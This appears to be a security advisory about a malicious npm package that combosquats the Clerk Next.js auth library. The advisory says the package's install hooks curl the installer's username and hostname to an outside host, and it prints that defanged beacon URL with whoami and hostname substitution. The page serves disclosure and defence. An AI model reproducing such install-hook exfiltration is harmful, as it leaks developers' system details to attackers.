LWA-2026-7109 MAL-2026-11069 ↗ confirmed malware

clerk-next-fix-auth-protection@7.7.7

Malicious code in clerk-next-fix-auth-protection (npm)

T1195.002 · Compromise Software Supply ChainT1059.007 · JavaScriptT1082 · System Information DiscoveryT1071.001 · Web ProtocolsT1041 · Exfiltration Over C2 Channel

Analysis

Dependency-confusion combosquat targeting the @clerk/nextjs authentication library. The package ships no functional code — only a package.json with preinstall and postinstall hooks that curl the installer's username and hostname to hxxp://u3ukeehm[.]requestrepo[.]com/depconf/clerk-next-fix-auth-protection/?u=$(whoami)&h=$(hostname). The high version number (7.7.7) is designed to take precedence over the legitimate package in automatic resolution. The C2 beacon host is u3ukeehm[.]requestrepo[.]com.

analyzed by
Leitwacht
first seen
Jul 24, 2026, 09:16 PM
analyzed
Jul 24, 2026, 09:16 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.